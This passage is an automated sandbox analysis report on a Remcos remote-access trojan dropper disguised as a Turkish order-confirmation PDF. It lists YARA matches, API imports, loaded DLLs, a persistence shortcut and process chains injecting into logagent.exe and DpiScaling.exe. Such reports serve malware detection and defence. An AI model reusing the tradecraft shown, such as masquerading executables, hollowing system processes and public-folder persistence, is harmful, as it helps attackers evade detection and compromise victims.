                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\Public\Libraries\wflizeiulE.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054F910 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress, 3_2_1054F910
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E9B05 0_3_036E9B05
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E1A14 0_3_036E1A14
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_036E19E8 0_3_036E19E8
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Code function: 0_3_038D3D3F 0_3_038D3D3F
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 3_2_0040D2A6
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10541006 3_2_10541006
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 00413E72 appears 49 times
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0041203B appears 31 times
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 10555801 appears 49 times
                    Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105555CE NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 3_2_105555CE
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310969892.00000000022EA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Eluiezilfw.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Eluiezilfw.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: am.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: system.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: archiveint.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: mpclient.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: endpointdlp.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ????.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??l.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ??.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: ?????????.dll
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Section loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: am.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: system.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: archiveint.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: mpclient.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ????.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??????.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: am.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: system.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: archiveint.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: mpclient.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ????.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??l.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: ??????.dll
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Section loaded: endpointdlp.dll
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe ReversingLabs: Detection: 21%
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File read: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown Process created: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe "C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe"
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
                    Source: unknown Process created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
                    Source: unknown Process created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
